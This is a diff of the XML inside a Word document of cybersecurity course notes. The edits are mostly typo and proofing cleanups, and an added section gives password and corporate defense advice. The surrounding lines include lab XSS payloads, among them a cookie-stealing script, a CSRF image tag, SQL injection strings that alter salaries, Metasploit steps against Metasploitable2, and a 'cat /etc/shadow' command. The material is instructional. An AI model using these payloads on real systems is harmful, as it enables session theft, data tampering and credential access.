--- a/CD_Session4.docx
+++ b/CD_Session4.docx
@@ -367,13 +367,8 @@
         <w:t xml:space="preserve"> named </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">David </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Kernell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>David Kernell</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -532,15 +527,7 @@
         <w:t>"</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Which city </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>were</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> you born</w:t>
+        <w:t>Which city were you born</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> in</w:t>
@@ -594,7 +581,13 @@
         <w:t xml:space="preserve"> "</w:t>
       </w:r>
       <w:r>
-        <w:t>Boing747</w:t>
+        <w:t>Bo</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ing747</w:t>
       </w:r>
       <w:r>
         <w:t>"</w:t>
@@ -1162,6 +1155,9 @@
         <w:t xml:space="preserve">require </w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve">an </w:t>
+      </w:r>
+      <w:r>
         <w:t>Oracle virtual machine</w:t>
       </w:r>
       <w:r>
@@ -1376,17 +1372,7 @@
         <w:ind w:firstLine="720"/>
       </w:pPr>
       <w:r>
-        <w:t>fun to hang out with &lt;script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>window.alert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>("You are hacked!")&lt;/script&gt;</w:t>
+        <w:t>fun to hang out with &lt;script&gt;window.alert("You are hacked!")&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1448,25 +1434,7 @@
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>college student. &lt;script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>window.alert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>document.cookie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)&lt;/script&gt;</w:t>
+        <w:t>college student. &lt;script&gt;window.alert(document.cookie)&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1503,31 +1471,7 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">&lt;I&gt; a cool duke&lt;/I&gt;&lt;script&gt;var image = new </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Image(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>image.src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>="http://localhost?myCookie=" + escape(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>document.cookie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>);&lt;/script&gt;</w:t>
+        <w:t>&lt;I&gt; a cool duke&lt;/I&gt;&lt;script&gt;var image = new Image();image.src="http://localhost?myCookie=" + escape(document.cookie);&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1669,16 +1613,11 @@
       <w:r>
         <w:t xml:space="preserve">t it? So, this is </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>some kind of</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> forgery</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
+        <w:t xml:space="preserve"> forgery. </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">This </w:t>
@@ -1757,15 +1696,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">The page </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>actually contains</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">The page actually contains </w:t>
       </w:r>
       <w:r>
         <w:t>the following:</w:t>
@@ -1826,15 +1757,13 @@
         <w:pStyle w:val="CSBody"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">This is a welcome page from </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Boby's</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> site. Thank you for visiting</w:t>
+        <w:t>This is a welcome page from Bob</w:t>
+      </w:r>
+      <w:r>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:t>y's site. Thank you for visiting</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1842,15 +1771,7 @@
         <w:pStyle w:val="CSBody"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>img</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> src="http://www.csrflabelgg.com/action/friends/add?friend=43"&gt;</w:t>
+        <w:t>&lt;img src="http://www.csrflabelgg.com/action/friends/add?friend=43"&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1904,15 +1825,7 @@
         <w:t xml:space="preserve">hoever </w:t>
       </w:r>
       <w:r>
-        <w:t>has the id 43 (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Boby</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) will become Alice</w:t>
+        <w:t>has the id 43 (Boby) will become Alice</w:t>
       </w:r>
       <w:r>
         <w:t>'</w:t>
@@ -2016,7 +1929,19 @@
         <w:t>use</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> store procedure or prepared statement to escape </w:t>
+        <w:t xml:space="preserve"> store</w:t>
+      </w:r>
+      <w:r>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> procedure or prepared statement</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to escape </w:t>
       </w:r>
       <w:r>
         <w:t>from SQL Injection.</w:t>
@@ -2067,13 +1992,8 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:t>admin</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>';#</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>admin';#</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2126,18 +2046,11 @@
       <w:r>
         <w:t xml:space="preserve">Time to </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>hack</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>',salary</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>=99999 where id=1;#</w:t>
+      <w:r>
+        <w:t>',salary=99999 where id=1;#</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2157,19 +2070,20 @@
           <w:numId w:val="46"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Boby</w:t>
+      <w:r>
+        <w:t>Bob</w:t>
+      </w:r>
+      <w:r>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:t>y</w:t>
       </w:r>
       <w:r>
         <w:t>'</w:t>
       </w:r>
       <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> salary is currently 50,000</w:t>
+        <w:t>s salary is currently 50,000</w:t>
       </w:r>
       <w:r>
         <w:t>,</w:t>
@@ -2188,26 +2102,22 @@
       <w:pPr>
         <w:ind w:firstLine="360"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>',salary</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>=salary-1 where id=2;#</w:t>
+      <w:r>
+        <w:t>',salary=salary-1 where id=2;#</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="360"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Boby’s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> salary is now $</w:t>
+      <w:r>
+        <w:t>Bob</w:t>
+      </w:r>
+      <w:r>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:t>y’s salary is now $</w:t>
       </w:r>
       <w:r>
         <w:t>1 less, 49,999.</w:t>
@@ -2490,7 +2400,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Metasploit is a penetration testing tool that comes packaged with Kali Linux. If you install Kali Linux, you got Metasploit with it. Here is the bad news. Metasploit is a command</w:t>
+        <w:t>Metasploit is a penetration testing tool that comes packaged with Kali Linux. If you install Kali Linux, you g</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t Metasploit with it. Here is the bad news. Metasploit is a command</w:t>
       </w:r>
       <w:r>
         <w:t>-</w:t>
@@ -2550,10 +2466,7 @@
         <w:t>s with</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> K</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ali-</w:t>
+        <w:t xml:space="preserve"> Kali-</w:t>
       </w:r>
       <w:r>
         <w:t>L</w:t>
@@ -2568,15 +2481,7 @@
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Otherwise, you </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>have to</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> install Armitage on Kali</w:t>
+        <w:t>Otherwise, you have to install Armitage on Kali</w:t>
       </w:r>
       <w:r>
         <w:t>-</w:t>
@@ -2692,11 +2597,9 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>armitage</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2757,13 +2660,8 @@
       <w:r>
         <w:t>-&gt;</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>NMap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Scan</w:t>
+      <w:r>
+        <w:t>NMap Scan</w:t>
       </w:r>
       <w:r>
         <w:t>=&gt;</w:t>
@@ -2907,29 +2805,8 @@
       <w:r>
         <w:t xml:space="preserve">If the scan stops, </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Go</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> into /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/share/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-framework/modules</w:t>
+      <w:r>
+        <w:t>Go into /usr/share/metasploit-framework/modules</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> folder and delete that particular module </w:t>
@@ -3014,14 +2891,12 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>w</w:t>
       </w:r>
       <w:r>
         <w:t>hoami</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3035,13 +2910,8 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> address</w:t>
+      <w:r>
+        <w:t>ip address</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3155,15 +3025,7 @@
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>cat /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">/shadow </w:t>
+        <w:t xml:space="preserve">cat /etc/shadow </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3423,14 +3285,12 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>w</w:t>
       </w:r>
       <w:r>
         <w:t>hoami</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3453,13 +3313,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Had </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Metasploitable2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> OS and applications were patched, none of these penetration attempts would have been successful. </w:t>
+        <w:t xml:space="preserve">Had Metasploitable2 OS and applications </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">been </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">patched, none of these penetration attempts would have been successful. </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -3544,13 +3404,13 @@
         <w:t>s</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">. You can check for that by </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">search for "Automatic Update" from </w:t>
+        <w:t>. You can check for that by search</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ing</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> for "Automatic Update" from </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">the </w:t>
@@ -3638,14 +3498,12 @@
         </w:rPr>
         <w:t xml:space="preserve">Public </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
         <w:t>WiFi</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3655,26 +3513,10 @@
         <w:t>ny</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> public </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WiFi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">If you are on public </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WiFi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, u</w:t>
+        <w:t xml:space="preserve"> public WiFi. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>If you are on public WiFi, u</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">se </w:t>
@@ -3689,15 +3531,7 @@
         <w:t xml:space="preserve">tunnel </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">like </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>TunnelBear</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (free) before </w:t>
+        <w:t xml:space="preserve">like TunnelBear (free) before </w:t>
       </w:r>
       <w:r>
         <w:t>using it for anything</w:t>
@@ -3889,7 +3723,7 @@
         <w:t>is feature</w:t>
       </w:r>
       <w:r>
-        <w:t>. Always remember convenience is the enemy of security. Keeping your card key in the car is very convenient</w:t>
+        <w:t>. Always remember convenience is the enemy of security. Keeping your car key in the car is very convenient</w:t>
       </w:r>
       <w:r>
         <w:t>,</w:t>
@@ -3902,6 +3736,865 @@
       </w:r>
       <w:r>
         <w:t xml:space="preserve">ly unsecured. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Use Long Password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Longer</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> sentences for </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> are better than </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>c</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ryptic but short password.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:t>isspell a word or two</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in your password to avoid </w:t>
+      </w:r>
+      <w:r>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:t>Dictionary Attack</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Use Two Factor Authentication</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Use 2-factor authentication whenever possible. This will force you to login using your password and your phone/email. This increases your defense by many factors.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> This is inconvenient even for you, therefore, much more secure.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Unique</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Passwords must be unique </w:t>
+      </w:r>
+      <w:r>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:t>n every site. Never use the same in two sites.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> A stolen/cracked password from one site is bad enough</w:t>
+      </w:r>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> you don</w:t>
+      </w:r>
+      <w:r>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">t want another site to be compromised because you were lazy enough to use the same password </w:t>
+      </w:r>
+      <w:r>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:t>n two sites.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Use Password Manager</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Password Manager</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>are</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> great way</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to store all your passwords in a secure</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> place, no matter how long or</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> complex they are</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Dashlane, 1Password, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>LastPass</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>etc.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> are </w:t>
+      </w:r>
+      <w:r>
+        <w:t>great tool</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> for this. Make sure you use 2-factor authentication to log</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>in to your password manager</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and your password manager logs you out 1) when idle for </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">few seconds 2) when you close your browser. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Cyber </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Defense</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Corporate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">What do corporations do to improve cyber </w:t>
+      </w:r>
+      <w:r>
+        <w:t>defense</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">? There are many tools and techniques that corporations use to </w:t>
+      </w:r>
+      <w:r>
+        <w:t>enhanc</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">e their cybersecurity. Below are some of the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>method</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s and tools:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Disk Encryption</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tools like McAfee Drive Encryption is full disk encryption software that helps protect data on Microsoft Windows tablets, laptops, and PCs to prevent the loss of sensitive data, especially from lost or stolen equipment.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Antivirus Software</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Tools like McAfee Anti-virus software</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>are</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> installed in all servers and workstations to stop malware from attacking machines. These tools receive </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>frequent update on the list of malware and their protective mechanism</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Patching and Upgrades</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Continuous patching and upgrades of </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">phones, tablets, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>workstations</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> server</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> keep corporates protected from </w:t>
+      </w:r>
+      <w:r>
+        <w:t>vulnerabilities</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Tools like IBM BigFix allows </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>corporation to keep their workstations</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and servers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> up-to-date with patches and upgrades.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Email Quarantine Software</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Spam emails and Phishing attacks are everyday events in today</w:t>
+      </w:r>
+      <w:r>
+        <w:t>'s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> world. Companies use tools to quarantine emails to block such attempts. Proofpoint Protection Server is </w:t>
+      </w:r>
+      <w:r>
+        <w:t>a tool that monitors incoming emails and filters them, and presents</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> block reports to the users.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Content Caching</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>One of the best way</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to provide </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">quick response and </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">defend </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">against </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>denial of service</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (DOS)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> attack is to use distributed content caching software in front of </w:t>
+      </w:r>
